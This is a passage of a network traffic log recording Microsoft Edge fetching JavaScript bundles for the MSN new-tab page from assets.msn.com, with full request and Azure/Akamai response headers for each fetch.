nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-decoration-combo.dde4b1c2e91d0ae13ee5.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/native-ad-decoration-combo.dde4b1c2e91d0ae13ee5.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: A3jVnsVIoFL6+h7bs6qLAA==
last-modified: Fri, 16 Dec 2022 21:57:03 GMT
etag: 0x8DADFB0777F6CE6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e5e28c5a-601e-00fa-6576-13a6d8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607200,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=34, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cda0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-like-button.68a5d03024e2d997e0d8.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/native-ad-like-button.68a5d03024e2d997e0d8.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: VmMof/afZYVl5D7dvkWPBQ==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB07989BD74
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e5e0d0e9-601e-00fa-0f76-13a6d8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607234,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=32, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cdc2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-sales-highlight-v1.fc83432c05225bef9020.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/native-ad-sales-highlight-v1.fc83432c05225bef9020.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: tiluJs6z0KRw597bqUu04Q==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07B1C5787
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5c4e3b3c-a01e-00ca-2b75-1387c9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607262,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cdde
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-sales-highlight-v3v4.f899fae2a4c0ee0a240e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/native-ad-sales-highlight-v3v4.f899fae2a4c0ee0a240e.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: I8auvdtAD7rmguR4KOSLKQ==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB078EE308D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d65546d7-101e-005d-2a76-13b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607323,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=28, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ce1b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-trending.0170e00a2d7de64c7c7e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/native-ad-trending.0170e00a2d7de64c7c7e.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 8CweXfWODCSpf64aB6kIQg==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6DC36E7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe5ee18-a01e-00f6-435a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607352,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ce38
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/nativeadsdecorations.a97b85a690ead9e855a6.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/nativeadsdecorations.a97b85a690ead9e855a6.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: uuW7/QRQGQOhmBmQ29y1+w==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079DD9D8D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 157761ce-601e-0052-71ef-1338af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607416,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ce78
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/nativeadstemplates.75bac078588f2efa0475.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/nativeadstemplates.75bac078588f2efa0475.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ozRpuRXsRdcq2/zcFSo2sg==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB07952FE0A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 83bcf28f-f01e-00c7-6d75-1358d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607460,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cea4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/navigation-page-experience.c48d83f131479394abde.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/navigation-page-experience.c48d83f131479394abde.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: G9fHGcmAivVt34N599qMkQ==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF8513B3E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b41d22a0-201e-0046-675c-142485000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607526,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cee6
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/news-headline-below-searchbox.c657f4383d8be5190212.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/news-headline-below-searchbox.c657f4383d8be5190212.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: EAXgINqYStoPDQDqXd2DIQ==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF5021706
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe3da4c-a01e-00f6-3e5a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607560,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cf08
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/news-segment-carousel.798e95801ce23f261ce9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/news-segment-carousel.798e95801ce23f261ce9.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: HFjbgiaXFY9Jd6LE4RbYyw==
last-modified: Tue, 20 Dec 2022 23:56:08 GMT
etag: 0x8DAE2E5C3C58F13
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 10e46c05-501e-00cd-1a0f-1556c7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607596,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cf2c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/newsbar-toggle.b3d4d234765acfcd1354.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/newsbar-toggle.b3d4d234765acfcd1354.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 8POzddlN/j9oHrS7Pw8kWA==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07AF5E96B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f2bf4fd4-201e-00ee-67f7-12baf2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607700,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cf94
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_intersection-observer_intersection-observer_js.7ed8a4e215d160c64db4.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/node_modules_intersection-observer_intersection-observer_js.7ed8a4e215d160c64db4.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: KfJen2ElIR0LMPgn38lbTQ==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF861B38A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f3df2afb-101e-00f5-245b-142fc7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607760,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cfd0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_microsoft_teams-js_dist_MicrosoftTeams_min_js.814c5857b6e2e0ee1e32.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/node_modules_microsoft_teams-js_dist_MicrosoftTeams_min_js.814c5857b6e2e0ee1e32.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: rqwnvwU4YMJNZrZJsqC7jA==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB079398652
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f6bda551-e01e-00a6-17f7-1231f2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431607789,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9cfed
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/node.index.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: N5/9QA5w14Fng6aDAMVtqQ==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C1767763
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2ec0349b-d01e-00f9-3220-1adbde000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:38 GMT
content-length: 2890
akamai-request-bc: [a=88.221.24.111,b=431607894,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d056
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/ocv-feedback-data/index.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: sh0Y2R0+5hPEZgmdJrV71w==
last-modified: Tue, 20 Dec 2022 23:56:06 GMT
etag: 0x8DAE2E5C2C3FC33
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 47b3b80c-501e-00a5-7366-154cf4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:38 GMT
content-length: 151
akamai-request-bc: [a=88.221.24.111,b=431608053,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=32, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d0f5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/ocv-feedback-data/OcvFeedbackData.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/ocv-feedback-data/OcvFeedbackData.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: IJVnM9Qh2E/ZSE5a2G1JLw==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079EED915
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d13fa36c-c01e-0020-4c75-139cab000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:38 GMT
content-length: 1453
akamai-request-bc: [a=88.221.24.111,b=431608098,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d122
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/office-coachmark.7bcca8947168ab4a4369.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/office-coachmark.7bcca8947168ab4a4369.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
